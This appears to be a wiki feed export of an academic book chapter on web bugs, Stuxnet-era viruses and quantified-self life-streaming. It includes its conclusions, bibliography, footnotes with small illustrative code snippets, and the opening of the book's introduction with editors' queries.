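A minimal sketch of that comparison step might look as follows; the numbers are invented, and real analytics pipelines are of course far more elaborate: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import statistics

history = [7200, 8100, 6900, 7600, 8000, 7400, 7900]  # a week of step counts
today = 3100

mean = statistics.mean(history)
sd = statistics.stdev(history)
z = (today - mean) / sd           # distance of today from the personal norm

# A simple pattern-match: flag any day more than two deviations from the norm
if abs(z) &amp;gt; 2:
    print('unusual day: z-score', round(z, 1))
&amp;lt;/pre&amp;gt; &lt;br /&gt;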
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally constructs a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational ‘care of the self’, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives through a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together, to think about living in code and software, and about the implications for the wider research into, and theorisation of, computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software in order to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions about security, consent, and how much users can ever know about the software they run. Yet users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive - under the surface, relatively benign and silent - yet aggressive in their hoarding of data, monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology from the Latin ''compactus'', closely put together or joined together, likewise neatly expresses the sense of what web bugs and related technologies are. Compactants can further be thought of in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’: server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the ‘future self’ will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative context to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as ‘future self continuity’ (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst we can draw on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both those of the present looking to provide critique and counterfactuals, and those ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship, ref: 211106, which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
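&lt;br /&gt;
To make the mechanism Mittal describes concrete, here is a minimal sketch in TypeScript (the cookie names and values are invented for illustration) of the browser's side of the exchange: &lt;br /&gt;
&amp;lt;pre&amp;gt;
// The server first answers a request with a header such as:
//   Set-Cookie: uid=abc123; Path=/; Expires=Tue, 02 Mar 2013 00:00:00 GMT
// and the browser then re-sends that value with every request to the
// domain until the cookie expires or is reset.

// Client-side scripts can read the stored state (a single string):
const state: string = document.cookie; // e.g. 'uid=abc123; lang=en'

// They can also set their own (hypothetical) state cookie directly:
document.cookie = 'basket=item42; path=/; max-age=86400';
&amp;lt;/pre&amp;gt; &lt;br /&gt;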
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm is able to transfer itself without requiring any human action: it takes advantage of a computer's file or information transport features, such as its networking setup, to travel from machine to machine unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and enrichment process by careful analysis of background images accidentally captured on computers used by the president; see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). [Eds: Can you review and revise this note where necessary]&lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4714</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4714"/>
		<updated>2012-04-18T17:23:43Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
